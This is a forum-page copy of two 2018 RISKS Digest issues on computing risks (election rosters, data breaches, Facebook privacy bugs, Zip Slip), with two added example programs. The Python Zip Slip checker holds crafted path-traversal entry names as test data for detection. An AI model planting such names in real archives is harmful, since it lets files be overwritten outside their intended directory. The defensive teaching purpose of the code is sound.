    (There are hacks we can use to make it possible to imagine views nobody has
    ever held. We can make random juxtapositions, impose meaning on them, and
    then figure out a justification for them -- like tarot reading. Or,
    we can merely iterate from some basic idea, getting more and more extreme,
    while internalizing the perspective of each iteration as something someone
    could possibly believe in good faith. The former -- the bibliomancy
    approach -- is common in experimental art, while the latter is
    typical of dystopian science fiction.

    But, these hacks are pretty limited. We need a starting place. If
    we've only heard mainstream ideas, we're going to have a
    hard time going off the beaten path with the dystopia approach, while we
    will struggle with the bibliomancy approach because most ideas can only be
    made to seem reasonable with the help of other ideas. Getting into uncharted
    territories with either of these approaches is difficult unless
    you've already filled out the middle of your possibility space with
    other ideas, because in their absence you would need to independently
    reinvent them.)

    This is not a justification, in and of itself, for banning metrics entirely.
    After all, this kind of exponential distribution happens with ideas even
    without the use of popularity signifiers: ideas spread, and popular ideas
    have more opportunities to spread. Trendism merely accelerates the process
    and widens the gap between the most popular ideas and everything else.

    Sites like reddit use segmentation to prevent total ordering of popularity
    from dominating, although this ultimately means that popular subreddits have
    a disproportionate impact on this total ordering when it is seen.
    http://redditp.com/r/all

    Similarly, we have seen piecemeal attempts to limit the effects of trendism
    for particular topics -- the curation of trending topics at twitter and
    facebook, for instance, or ad-hoc ranking demerits for particular tags on
    lobste.rs.

    However, we could be applying the measurements we already take to counteract
    trendism rather than accelerating it: making popularity count less the
    higher it gets, removing overly-popular content entirely, boosting the
    visibility of mostly-unseen content, using information about organic reach
    in sites like twitter to boost the synthetic reach of people who
    don't have many followers (instead of boosting the synthetic reach
    of the rich), systematically demoting posts that comment on trending topics,
    spotlighting spotify tracks and youtube videos with zero views, and so on.

    Where trendism devalues the function of recommendation systems as novelty
    aggregators, these tools could be modified to be anti-trendist, pro-novelty,
    and promote a cosmopolitanism that broadens our horizons in ways traditional
    word-of-mouth never could. This is a unique capacity of recommendation
    systems over curators: recommendation systems can recommend things nobody
    has ever seen, and can recommend them on the grounds that nobody has seen
    them.

    ------------------------------

    Date: Mon, 28 May 2018 09:38:16 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: Securing Elections

    I don't wish to start a political argument, but from a practical POV, there
    is merit to the US method of "the winner takes it all" -- eventually, one
    candidate wins, and incumbents should be let to do their job to the best of
    their ability. Compare that to relational methods in some European
    countries, which have brought about unstable governments which are
    reshuffled often (like in France before the 1968, or current Italy).

    History has proven -- from the resignation of Nixon to the recent upheaval in
    Armenia -- that as long as freedom of expression and assembly are kept, the
    public would eventually be able to express enough dissent to get rid of
    corrupt politicians, no matter which system was used to elect them in the
    first place.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!
    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.71
    ************************
  6. LakeGator

    Risks Digest 30.72

    RISKS List Owner

    Jun 12, 2018 8:07 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Tuesday 12 June 2018 Volume 30 : Issue 72

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Another risk of driverless cars (PGN)
    Emirates looks to windowless planes (bbc.com)
    180,000 Voters accidentally left off LA County polling place rosters
    (Irfan Khan)
    Ontario election results Not a Number (Tony Marmic)
    Florida skips gun background checks for a year after employee forgets login
    (Naked Security)
    All accredited journalists at the #KimTrumpSummit get a free USB fan
    (YCombinator)
    Israelis nabbed in Philippines are tip of iceberg in alleged fraud
    gone global (The Times of Israel)
    Sweden Tries to Halt Its March to Total Cashlessness (Bloomberg)
    Cryptocurrencies Lose Billions In Value After An Exchange Is Hacked
    "Cryptocurrency theft malware is now an economy worth millions" (NPR)
    Quebec Halts Bitcoin Mining Power Requests Amid Booming Demand
    (Charlie Osborne)
    The Spanish Liga uses the phone microphone of millions of fans
    to spy on bars (El Diario)
    Navy Contractor Hacked: Reams of Secret Documents Taken (WashPo)
    G Suite leaks in 10,000+ orgs: Google UX blamed, fury at no-bug defense
    (TechBeacon)
    "Password reset flaw at Internet giant Frontier allowed account takeovers"
    (Zack Whittaker)
    Why a DNA data breach is much worse than a credit card leak (The Verge)
    "Facebook gave some companies extended access to user data"
    (Stephanie Condon)
    Facebook bug made up to 14 million users' posts public for days (WiReD)
    "Cisco fixes critical bug that exposed networks to hackers"
    (Zack Whittaker)
    "Meet Norman, the world's first 'psychopathic' AI" (Charlie Osborne)
    Should We Always Trust What We See in Satellite Images?
    (Scientific American)
    The NSA Just Released 136 Historical Propaganda Posters (Motherboard)
    Unproven facial-recognition companies target schools, promising an
    end to shootings (WashPo)
    The Zip Slip vulnerability: what you need to know (Naked Security)
    All the people Apple just pissed off to better protect your privacy
    (Fast Company)
    Recounting 'Horror Stories' Over Guitar Center's Warranties (NYT)
    Add Bryan Colangelo to the long list who have been burned by social media
    (ESPN)
    Microsoft, Github, & distributed revision control (Medium)
    How the body could power pacemakers and other implantable devices
    (Charles Q. Choi)
    Having better risk-based analysis for your banks and credit cards
    (David Strom, Phil Smith III)
    Re: Securing Elections (Chris Drewe)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Mon, 11 Jun 2018 9:27:18 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Another risk of driverless cars

    NPR reported today that Waymo is buying a slew of cars to create a
    driverless taxi fleet with no human overseer required in the car. Emergency
    takeover would be done by a fleet of well-trained remote admin personnel,
    *via cell phone*.

    There seem to be some massive flaws in that reasoning. One is the need for
    real-time response. Another is unavailable cell-phone coverage.

    I recall the case of someone who used his cellphone to start his car at
    home, and then drove into Red Rock Canyon Park, parked, and later tried to
    start his car (with the presence of his cellphone). Unfortunately, he had
    left his wireless unlocking/starting dongle at home, and there was no cell
    coverage in the canyon. His wife climbed up out of the canyon, called a
    neighbor who could get the remote dongle out of their house, and bring it to
    them so that they could drive home.

    Just one more example of short-sightedness and lack of awareness...

    ------------------------------

    Date: Wed, 06 Jun 2018 19:44:30 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Emirates looks to windowless planes (bbc.com)



    Aviation safety expert Professor Graham Braithwaite of Cranfield University:

    ``Cabin crew need to be able to see outside the aircraft if there is an
    emergency. Being able to see outside the aircraft in an emergency is
    important, especially if an emergency evacuation has to take place. Flight
    attendants would need to check outside the aircraft in an emergency, for
    example for fire, before opening a door and commencing an evacuation - and
    anything that needed power to do this may not be easy to get certified by
    an aviation safety regulator.'' Prof Braithwaite said the main obstacle
    in a windowless aircraft would be passenger perceptions of the
    technology.

    However, aviation regulator the European Aviation Safety Agency said: "We
    do not see any specific challenge that could not be overcome to ensure a
    level of safety equivalent to the one of an aircraft fitted with cabin
    windows."

    In addition to emergency evacuation slides, perhaps an emergency "peep hole"
    to supplement camera or screen failure?

    [Perhaps the pilots would not need windows either, because everything is
    computer controlled? PGN]

    ------------------------------

    Date: Wed, 6 Jun 2018 5:50:18 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: 180,000 Voters accidentally left off LA County polling place rosters
    (Irfan Khan)

    (Irfan Khan / Los Angeles Times)
    Poll worker Shannon Diaz puts up signs as voting begins at El Mercado de
    Los Angeles in Boyle Heights on Tuesday.

    If you are a registered voter in Los Angeles County and poll workers say
    they can't find your name on the roster at the polling place when you go to
    vote, don't worry -- you can still cast a provisional ballot.

    Some Angelenos needed a bit of reassurance that their votes would be counted
    in Tuesday's primary election after 118,522 voters' names were accidentally
    left off rosters due to a printing error, according to L.A. County
    Registrar Dean C. Logan.

    About 2.3% of L.A. County's 5.1 million registered voters and 35% of the
    county's 4,357 precincts were affected by the error, according to figures
    provided by the registrar-recorder/county clerk's office, which was still
    trying to determine the reason for the printing error. Voters whose names
    are missing are being encouraged to file provisional ballots, which are
    verified by vote counters later.

    118,522 voters accidentally left off Los Angeles County polling place rosters

    ------------------------------

    Date: Fri, 8 Jun 2018 16:42:48 -0400
    From: Tony Harminc <thar...@gmail.com>
    Subject: Ontario election results Not a Number

    Early in the counting for the Ontario provincial election on Thursday
    evening 2018-06-07, I noticed the CBC election site displayed this dynamic
    table of popular vote numbers:

    Party   Votes      Vote Share
    PC      389,435    40.45%
    NDP     333,475    34.63%
    LIB     174,446    18.12%
    GRN      48,022     4.99%
    OTH      17,467      NaN%

    The "NaN%" survived several on-the-fly updates to the numbers.

    When I checked on Friday morning, with final results in, the table was

    Party   Votes        Vote Share
    PC      2,322,422    40.63%
    NDP     1,925,574    33.69%
    LIB     1,103,283    19.30%
    GRN       263,987     4.62%
    OTH       100,058     1.75%

    It's not obvious to me why the first set of numbers should lead to a NaN for
    the "OTH" parties vote share rather than 1.81%. The page is still there at
    Ontario Election Results From CBC News if anyone cares to
    investigate the code, but I don't know how long it'll last. One trusts that
    this code is purely for display on the CBC website, and has nothing to do
    with actual vote tallying...

    In passing, this election was conducted with paper ballots hand marked and
    scanned by machine, with the ballots retained for hand recount if necessary,
    so pretty much Best Practice as I understand it. I don't believe any such
    recount has been called for.
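
    As an added illustration of how a single results cell can come out as
    "NaN%" (example code, not the CBC's, and the cause of the actual glitch is
    not known), the JavaScript below shows that NaN propagates silently through
    division and toFixed() when an operand is missing or is an unparsed display
    string, and a defensive formatter that validates both operands and emits an
    explicit placeholder instead. The rows are constructed from the early-count
    table quoted above; the field names and the placeholder text are assumptions.

```javascript
// Added example (not the CBC's code). Demonstrates how "NaN%" reaches a page
// and how a defensive share formatter prevents it. Field names are assumed.

// Naive formatter in the style many dashboards use. NaN propagates silently
// through "/", "*" and toFixed(): NaN.toFixed(2) is the string "NaN", so any
// bad operand surfaces only as the literal "NaN%" in the rendered cell.
function naiveShare(votes, total) {
  return (votes / total * 100).toFixed(2) + "%";
}

// Parse a vote count that may arrive as a number or as a display string with
// thousands separators ("17,467"). Number("17,467") is NaN and
// parseInt("17,467", 10) silently returns 17, so strip separators first and
// validate explicitly. Returns null for anything that is not a whole count.
function parseVotes(value) {
  if (typeof value === "number") {
    return Number.isFinite(value) && value >= 0 ? value : null;
  }
  if (typeof value !== "string") return null;
  const cleaned = value.replace(/[,\s]/g, "");
  if (!/^\d+$/.test(cleaned)) return null;
  return Number(cleaned);
}

// Defensive formatter: validates both operands and refuses to divide by zero,
// returning a visible placeholder (assumed wording) rather than letting NaN
// flow into the DOM.
function voteShare(votes, total, placeholder = "n/a") {
  const v = parseVotes(votes);
  const t = parseVotes(total);
  if (v === null || t === null || t === 0) return placeholder;
  return (v / t * 100).toFixed(2) + "%";
}

// Early-count rows constructed from the table quoted in the post. Counts are
// kept as display strings to mimic data that arrives pre-formatted.
const earlyRows = [
  { party: "PC",  votes: "389,435" },
  { party: "NDP", votes: "333,475" },
  { party: "LIB", votes: "174,446" },
  { party: "GRN", votes: "48,022" },
  { party: "OTH", votes: "17,467" },
];

// Build the share column for a set of rows; the denominator is the sum of all
// parseable counts. Rows that fail to parse contribute nothing to the total
// and render as the placeholder rather than poisoning every other row.
function shareTable(rows, formatter = voteShare) {
  const total = rows.reduce((sum, r) => {
    const v = parseVotes(r.votes);
    return sum + (v === null ? 0 : v);
  }, 0);
  return rows.map(r => ({ party: r.party, share: formatter(r.votes, total) }));
}

// Stand-alone demonstration.
console.log("naive, missing numerator:", naiveShare(undefined, 962845)); // NaN%
console.log("naive, formatted string:", naiveShare("17,467", 962845));   // NaN%
for (const row of shareTable(earlyRows)) {
  console.log(row.party.padEnd(4), row.share.padStart(7));
}
```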

    ------------------------------

    Date: Tue, 12 Jun 2018 11:52:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Florida skips gun background checks for a year after employee
    forgets login (Naked Security)

    In Florida, the site of recent mass shootings such as at the Stoneman
    Douglas High School and the Pulse nightclub, more than a year went by in
    which the state approved applications without carrying out background
    checks. This meant the state was unaware if there was a cause to refuse a
    licence to allow somebody to carry a hidden gun -- for example, mental
    illness or drug addiction.

    The reason is dismayingly banal: an employee couldn't remember her login.

    Florida skips gun background checks for a year after employee forgets login

    ------------------------------

    Date: Mon, 11 Jun 2018 16:04:31 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: All accredited journalists at the #KimTrumpSummit get a free USB fan
    (YCombinator)

    [Nothing to worry about!]
    https://news.ycombinator.com/item?id=17285062

    Oh yeah. Just plug it into your computer. For sure.

    ------------------------------

    Date: Tue, 12 Jun 2018 13:01:51 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Israelis nabbed in Philippines are tip of iceberg in alleged fraud
    gone global (The Times of Israel)

    As police raid Israeli-operated boiler rooms in Asia and Eastern Europe,
    local law enforcement has yet to indict a single operative from an industry
    that has stolen billions

    Israelis nabbed in Philippines are tip of iceberg in alleged fraud gone global

    ------------------------------

    Date: Mon, 11 Jun 2018 17:53:32 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Sweden Tries to Halt Its March to Total Cashlessness (Bloomberg)

    via NNSquad
    Sweden Tries to Halt Its March to Total Cashlessness

    The move is a response to Sweden's rapid transformation as it becomes one
    of the most cashless societies in the world. That's led to concerns that
    some people are finding it increasingly difficult to cope without access
    to mobile phones or bank cards. There are also fears around what would
    happen if the digital payments systems suddenly crashed.

    ------------------------------

    Date: Mon, 11 Jun 2018 21:59:28 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Cryptocurrencies Lose Billions In Value After An Exchange Is Hacked
    (NPR)

    Coinrail virtual currency exchange was breached, and lost only $40M.
    Ethereum dropped, and the end result was an estimated $40B lost over the
    weekend to cryptocurrencies overall. (PGN-ed)
    https://www.npr.org/2018/06/11/6189...billions-in-value-after-an-exchange-is-hacked

    ------------------------------

    Date: Fri, 08 Jun 2018 20:23:45 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cryptocurrency theft malware is now an economy worth millions"
    (Charlie Osborne)

    Charlie Osborne for Zero Day (7 Jun 2018)
    Carbon Black research suggests that as interest in cryptocurrency rises,
    so does the market for weapons to steal it.
    https://www.zdnet.com/article/cryptocurrency-theft-malware-is-now-an-economy-worth-millions/

    selected text:

    The researchers estimate that over the past six months alone, a total of
    $1.1 billion has been stolen in cryptocurrency-related thefts, and
    approximately 12,000 marketplaces in the underbelly of the Internet are
    fueling this trend.

    In total, there are roughly 34,000 products and services on sale that are
    related to cryptocurrency theft, ranging from just over a dollar in price to
    $224, with an average cost of around $10.

    "The available dark web marketplaces represent a $6.7 million illicit
    economy built from cryptocurrency-related malware development and sales,"
    the researchers say.

    ------------------------------

    Date: Sun, 10 Jun 2018 18:06:14 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Quebec Halts Bitcoin Mining Power Requests Amid Booming Demand
    (Bloomberg)

    Hydro-Quebec will temporarily stop processing requests from cryptocurrency
    miners so that it can continue to fulfill its obligations to supply
    electricity to the entire province.

    Canada's biggest electric utility is facing unprecedented demand from
    blockchain companies that exceeds Hydro-Quebec's short- and medium-term
    capacity, according to a statement Thursday. In the coming days,
    Hydro-Quebec will file an application to the province's energy regulator
    proposing a selection process for blockchain industry projects.

    Hydro-Quebec has been courting cryptocurrency miners in recent months in a
    bid to soak up surplus energy from dams in northern Quebec. Power rates in
    the province are the lowest in North America, both for consumers and
    industrial customers.

    https://www.msn.com/en-us/news/mark...power-requests-amid-booming-demand/ar-AAylZv3

    Always risky, getting what you want.

    Then, there's this...
    https://techcrunch.com/2018/06/08/ibms-new-summit-supercomputer-for-the-doe-delivers-200-petaflops/

    ...which one commenter somewhere suggests should be used to mine bitcoins.
    Besides petaflop ratings, we need potential kWh/bitcoin comparisons.

    ------------------------------

    Date: Sun, 10 Jun 2018 21:01:19 -0400
    From: Jose Maria Mateos <ch...@rinzewind.org>
    Subject: The Spanish Liga uses the phone microphone of millions of fans
    to spy on bars (El Diario)

    Original article (in Spanish):
    https://www.eldiario.es/tecnologia/Liga-Futbol-microfono-telefono-aficionados_0_780772124.html

    Automated translation:
    https://translate.google.com/transl...lefono-aficionados_0_780772124.html&edit-text

    The Liga de Fútbol Profesional, the body that runs the most important
    sports competition in Spain, is using mobile phones of football fans to spy
    on bars and other public establishments that put matches for their
    clients. Millions of people in Spain have this application on their phone,
    which accumulates more than 10 million downloads, according to data from
    Google and Apple.

All of these people can become undercover informants for La Liga and the
owners of football television broadcasting rights. If they give their
consent for the app to use the device's microphone (which is common in many
applications), they are actually giving permission for La Liga to remotely
activate the phone's microphone and try to detect if what it sounds like is
a bar or public establishment where a football match is being shown
without paying the fee established by the chains that own the broadcasting
rights. In addition, it uses the geolocation of the phone to locate exactly
where that establishment is located.

    ------------------------------

    Date: Fri, 8 Jun 2018 17:10:09 -0400
    From: Mark Rockman <user...@mdrsesco.biz>
    Subject: Navy Contractor Hacked: Reams of Secret Documents Taken (WashPo)

*The Washington Post* reports "Chinese government hackers have compromised
the computers of a Navy contractor, stealing massive amounts of highly
sensitive data related to undersea warfare - including secret plans to
develop a supersonic anti-ship missile for use on U.S. submarines by 2020,
according to American officials." Gee. Do you think connecting secret
documents to the Internet is wise? Good thing the Manhattan Project only
had a Russian spy in their midst. Otherwise the Soviets may have stolen
nuclear secrets and got the bomb before 1949.

    https://www.washingtonpost.com/worl...8eb28bc52b1_story.html?utm_term=.e6cf621eb36c

    [Also noted by Jose Maria Mateos. PGN]

    ------------------------------

    Date: Thu, 7 Jun 2018 07:50:14 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: G Suite leaks in 10,000+ orgs: Google UX blamed, fury at no-bug
    defense (TechBeacon)

    via NNSquad
    https://techbeacon.com/g-suite-leaks-10000-orgs-google-ux-blamed-fury-no-bug-defense

    People keep misconfiguring G Suite to leak their companies' private
    data. An estimated 10,000 or more organizations are affected. Google
    denies it's a bug, passive-aggressively telling people to RTFM. But that's
    not the point, is it? Given the scale of the problem, shouldn't la GOOG be
    fixing an obvious admin UX problem?

    When you blame the users in situations like this, you've already lost the
    argument.

    ------------------------------

    Date: Fri, 08 Jun 2018 20:28:37 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Password reset flaw at Internet giant Frontier allowed account
    takeovers" (Zack Whittaker)

    Zack Whittaker for Zero Day (8 Jun 2018)
    Password reset flaw at Internet giant Frontier allowed account takeovers
    A two-factor code used to reset an account password could be easily bypassed.
    https://www.zdnet.com/article/password-reset-flaw-at-frontier-allowed-account-takeovers/

    opening text:

    A bug in how cable and Internet giant Frontier reset account passwords
    allowed anyone to take over user accounts.

The vulnerability, found by security researcher Ryan Stevenson, allows a
determined attacker to take over an account with just a username or email
address. And with a few hours' worth of determination, an attacker can bypass
the access code sent during the password reset process.

    ------------------------------

    Date: Mon, 11 Jun 2018 10:04:32 -0600
    From: "Matthew Kruk" <mkr...@gmail.com>
    Subject: Why a DNA data breach is much worse than a credit card leak
    (The Verge)

    https://www.theverge.com/2018/6/6/17435166/myheritage-dna-breach-genetic-privacy-bioethics

    ------------------------------

    Date: Fri, 08 Jun 2018 20:31:02 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Facebook gave some companies extended access to user data"
    (Stephanie Condon)

    Stephanie Condon for Between the Lines (ZDNet), 8 Jun 2018
    Facebook's acknowledgement of these agreements is the latest incident to
    shed light on the way the company has shared user data in ways users are
    unlikely to understand.
    https://www.zdnet.com/article/facebook-gave-some-companies-extended-access-to-user-data/

    opening text:

    In the latest revelation about Facebook's data-sharing practices, the social
    media giant acknowledged Friday that it gave certain companies extended,
    special access to user data in 2015 -- data that was already off limits to
    most developers.

    ------------------------------

    Date: Thu, 7 Jun 2018 13:39:07 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Facebook bug made up to 14 million users' posts public for days
    (WiReD)

    via NNSquad
    https://www.wired.com/story/facebook-bug-14-million-users-posts-public/

Facebook has found itself the subject of another privacy scandal, this
time involving privacy settings. A glitch caused up to 14 million Facebook
users to have their new posts inadvertently set to public, the company
revealed Thursday.

    "Private" posts that turned out to be public. Pretty much a worst case
    scenario.

    ------------------------------

    Date: Fri, 08 Jun 2018 20:21:00 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cisco fixes critical bug that exposed networks to hackers"
    (Zack Whittaker)

    Zack Whittaker, ZDNet, 7 Jun 2018
    The bug had a rare 9.8 out of 10 score on the common vulnerability
    severity rating scale.
    https://www.zdnet.com/article/cisco-fixes-critical-bug-that-exposed-networks-to-hackers/

    opening text:

    A "critical"-rated bug in one of Cisco's network access management devices
    could have allowed hackers to remotely break into corporate networks.

    ------------------------------

    Date: Fri, 08 Jun 2018 20:34:03 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Meet Norman, the world's first 'psychopathic' AI"
    (Charlie Osborne)

    Charlie Osborne for Between the Lines (ZDNet) 7 Jun 2018
    While you see flowers, Norman sees gunfire.
    https://www.zdnet.com/article/meet-norman-the-worlds-first-psychopathic-ai/

    selected text:

    Researchers at the Massachusetts Institute of Technology (MIT) have
    developed what is likely a world first -- a "psychopathic" artificial
    intelligence (AI).

    Norman is an AI system trained to perform image captioning, in which deep
    learning algorithms are used to generate a text description of an image.

    However, after plundering the depths of Reddit and a select subreddit
    dedicated to graphic content brimming with images of death and destruction,
    Norman's datasets are far from what a standard AI would be exposed to.

    The results are disturbing, to say the least.

    In one inkblot test, a standard AI saw "a black and white photo of a red and
    white umbrella," while Norman saw "man gets electrocuted while attempting to
    cross busy street."

    ------------------------------

    From: Richard M Stein <rms...@ieee.org>
    Date: Tue, 5 Jun 2018 06:21:03 -0700
    Subject: Should We Always Trust What We See in Satellite Images?
    (Scientific American)

    https://www.scientificamerican.com/article/should-we-always-trust-what-we-see-in-satellite-images/

    The author argues that an "on the ground" confirmation is a wise precaution
    to verify imagery content. Image processing algorithms can render misleading
    impressions which affect major decisions.

    "One example of the misuse of remotely sensed data was in 2003, when
    satellite images were used as evidence of sites of weapons of mass
    destruction in Iraq. These images revealed what were identified as active
    chemical munitions bunkers and areas where earth had been graded and moved
    to hide evidence of chemical production. This turned out not to be the
    case."

    "Trust but verify" remains a wise precaution to follow when analyzing
    satellite imagery.

    ------------------------------

    Date: Tue, 12 Jun 2018 13:20:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The NSA Just Released 136 Historical Propaganda Posters
    (Motherboard)

    https://motherboard.vice.com/en_us/article/43548d/nsa-historical-propaganda-posters-foia

    ------------------------------

    Date: Fri, 08 Jun 2018 06:56:43 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Unproven facial-recognition companies target schools, promising an
    end to shootings (WashPo)

    http://www.washingtonpost.com/busin...ory.html?noredirect=on&utm_term=.3fccfa98bcd2

    "Although facial recognition remains unproven as a deterrent to school
    shootings, the specter of classroom violence and companies intensifying
    marketing to local education officials could cement the more than 130,000
    public and private schools nationwide as one of America's premier testing
    grounds -- both for the technology's abilities and for public acceptance
    of a new generation of mass surveillance."

    Mass shootings at schools in the US, while statistically rare compared to
    other gun-related deaths (suicide, for instance), are horrifying events. A
    set of companies are pitching facial recognition technology as a bromide and
    deterrent, though they are coy to explain how their software stacks function
    or enable deterrence. Exploiting fear and anxiety are long-practiced sales
    techniques.

    ------------------------------

    Date: Wed, 6 Jun 2018 20:30:31 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: The Zip Slip vulnerability: what you need to know (Naked Security)

    Thanks to SRI's Steven Cheung for spotting this one.

    A fun vulnerability that uses zip files to overwrite files

    https://nakedsecurity.sophos.com/2018/06/06/the-zip-slip-vulnerability-what-you-need-to-know/
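As an added example (not code from the Sophos article or from any of the archive libraries it covers), the check below builds an in-memory zip containing path-traversal entry names, detects them, and refuses to extract unless every entry resolves inside the destination directory; entry names and contents are constructed for the demonstration.

```python
# Added example (not code from the Sophos article or any library it covers):
# build an in-memory archive with traversal entries, detect them, and extract
# only when every entry stays inside the destination directory.
# Entry names and contents are constructed for the demonstration.
import io
import os
import tempfile
import zipfile


def build_sample_zip(traversal: bool) -> bytes:
    """Constructed archive: one benign entry, plus two escaping entries if asked."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "harmless\n")
        if traversal:
            # Entry names are attacker-controlled strings. An extractor that
            # joins them onto the destination path without checking writes
            # outside the intended directory; that is the Zip Slip bug.
            zf.writestr("../../outside.txt", "must never be written\n")
            zf.writestr("/etc/absolute.txt", "absolute names are unsafe too\n")
    return buf.getvalue()


def is_within(dest_dir: str, name: str) -> bool:
    """True if dest_dir/name, after resolving '..' and symlinks, is inside dest_dir."""
    dest = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest, name))
    # commonpath, not startswith: '/out/dir' must not accept '/out/dir2/x'
    return os.path.commonpath([dest, target]) == dest


def unsafe_entries(zip_bytes: bytes, dest_dir: str) -> list:
    """Detection only: names of entries that would land outside dest_dir."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if not is_within(dest_dir, n)]


def safe_extract(zip_bytes: bytes, dest_dir: str) -> list:
    """Fail closed: reject the whole archive if any entry escapes, else extract.

    CPython's ZipFile.extract() already strips leading separators and '..'
    components, so this particular library is not vulnerable on its own; the
    explicit check is the portable defence to put in front of any extractor.
    """
    bad = unsafe_entries(zip_bytes, dest_dir)
    if bad:
        raise ValueError(f"refusing archive with traversal entries: {bad}")
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            zf.extract(info, dest_dir)
            written.append(info.filename)
    return written


def demo() -> dict:
    """Run detection and extraction over both constructed archives."""
    with tempfile.TemporaryDirectory() as dest:
        hostile = build_sample_zip(traversal=True)
        flagged = unsafe_entries(hostile, dest)
        try:
            safe_extract(hostile, dest)
            refused = False
        except ValueError:
            refused = True
        written = safe_extract(build_sample_zip(traversal=False), dest)
    return {"flagged": flagged, "refused": refused, "written": written}


if __name__ == "__main__":
    print(demo())
```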

    ------------------------------

    Date: Fri, 8 Jun 2018 12:29:03 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: All the people Apple just pissed off to better protect your privacy
    (Fast Company)

    When Apple previewed the upcoming iOS 12 and MacOS Mojave at this week's
    WWDC keynote,
    http://www.fastcompany.com/40578098/watch-apple-wwdc-livestream-live-coverage

The killer new features that got both developers and users most excited were
the ones you'd expect: the visually stunning Dark Mode on MacOS, the
insanely customizable Memojis on iOS, FaceTime group-calling features on
both platforms, massive improvements to Siri, and Apple's all-new Screen
Time digital health tracking tools.

    <http://www.fastcompany.com/40580992/macos-mojave-brings-dark-mode-better-privacy-and-more-ios-ideas>
    <http://www.fastcompany.com/40580906/apples-latest-animoji-you>
    <http://www.fastcompany.com/40580873/siri-wants-to-automate-your-life-with-shortcuts>
    <http://www.fastcompany.com/40581638...ome-real-responsible-use-features-but-why-now>

    All those features deserved the applause they got from the crowd. But it
    was other updates -- definitely less sexy and headline-grabbing -- that set
    Apple apart from other technology giants. I'm talking about the new privacy
    features built into both iOS 12 and MacOS Mojave that make it so much harder
    for other parties to get at your personal information.
    https://www.fastcompany.com/4058169...ust-pissed-off-to-better-protect-your-privacy

    ------------------------------

    Date: Fri, 8 Jun 2018 13:40:11 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Recounting 'Horror Stories' Over Guitar Center's Warranties (NYT)

    https://www.nytimes.com/2018/06/07/business/guitar-center-warranty.html

    Former employees and customers at the giant music retailer described
    problems with how it sells protection plans, particularly in Puerto Rico.

    ------------------------------

    Date: Fri, 8 Jun 2018 13:41:23 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Add Bryan Colangelo to the long list who have been burned by social
    media (ESPN)

    http://www.espn.com/nba/story/_/id/...-line-sports-figures-run-trouble-social-media

    ------------------------------

    Date: Tue, 5 Jun 2018 10:27:01 -0400
    From: John Ohno <john...@gmail.com>
